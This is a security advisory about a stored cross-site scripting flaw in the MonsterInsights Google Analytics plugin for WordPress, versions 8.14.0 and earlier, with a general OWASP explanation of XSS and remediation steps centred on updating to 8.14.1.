XSS Vulnerability in MonsterInsights – Google Analytics Dashboard for WordPress Plugin Hits +3 Million Websites

Stored Cross-Site Scripting (XSS) vulnerability in MonsterInsights plugin <= 8.14.0 versions affects up to +3 million websites

The U.S. National Vulnerability Database (NVD) recently announced that the MonsterInsights – Google Analytics Dashboard for WordPress Plugin <= 8.14.0 is vulnerable to Cross Site Scripting (XSS). The WordPress security company Patchstack discovered the vulnerability with the following details:

Rafie Muhammad (Patchstack) discovered and reported this Cross Site Scripting (XSS) vulnerability in WordPress Google Analytics by Monster Insights Plugin. This could allow a malicious actor to inject malicious scripts, such as redirects, advertisements, and other HTML payloads into your website which will be executed when guests visit your site.

This vulnerability has been fixed in version 8.14.1.

Recommended Action

If you are still using MonsterInsights plugin <= 8.14.0 versions, it is highly recommended to update the WordPress plugin immediately to the latest version or at least version 8.14.1.

The vulnerability was patched in version 8.14.1 and the plugin developers mentioned the following in the changelog on WordPress:

8.14.1: APR 11, 2023
Fixed: We fixed a PHP warning error and added additional security hardening.

The changelog reads “added additional security hardening”. It did not specifically read / disclose that security patch was released to fix XSS security vulnerability in the plugin. This could lead a user to skip / postpone updating the plugin.

What is Stored Cross-Site Scripting (XSS) vulnerability?

According to the Open Web Application Security Project, Cross-site Scripting is amongst the top 10 security vulnerabilities to web applications. OWASP defines Cross Site Scripting (XSS) as:

Cross-Site Scripting (XSS) attacks are a type of injection, in which malicious scripts are injected into otherwise benign and trusted websites. XSS attacks occur when an attacker uses a web application to send malicious code, generally in the form of a browser side script, to a different end user. Flaws that allow these attacks to succeed are quite widespread and occur anywhere a web application uses input from a user within the output it generates without validating or encoding it.

An attacker can use XSS to send a malicious script to an unsuspecting user. The end user’s browser has no way to know that the script should not be trusted, and will execute the script. Because it thinks the script came from a trusted source, the malicious script can access any cookies, session tokens, or other sensitive information retained by the browser and used with that site. These scripts can even rewrite the content of the HTML page.

Stored XSS Attacks

Stored XSS attacks are where the injected script is permanently stored on the target servers (in database, forum, log, etc.). The victim then retrieves the malicious script from the website server itself resulting in user data theft or a full site takeover.

The plugin, MonsterInsights – Google Analytics Dashboard for WordPress, was discovered to have the stored XSS version of the vulnerability. And the plugin is installed on more that 3+ million WordPress websites; thus making this vulnerability more concerning.

How to fix MonsterInsights – Google Analytics Dashboard for WordPress Vulnerability for your site

  1. Update MonsterInsights – Google Analytics Dashboard for WordPress plugin to use the latest version or at least version 8.14.1.
  2. Review all the user accounts; especially the administrator users in your WordPress dashboard and remove the suspected ones. Change the passwords for all the administrator accounts and shuffle WordPress salts.
  3. If you are running an e-commerce or membership site, request all your users to update their passwords.
  4. Run a full website malware scan to make sure your site is not compromised.
  5. In case the site is infected, you can engage our security team for professional website cleanup.

See Also: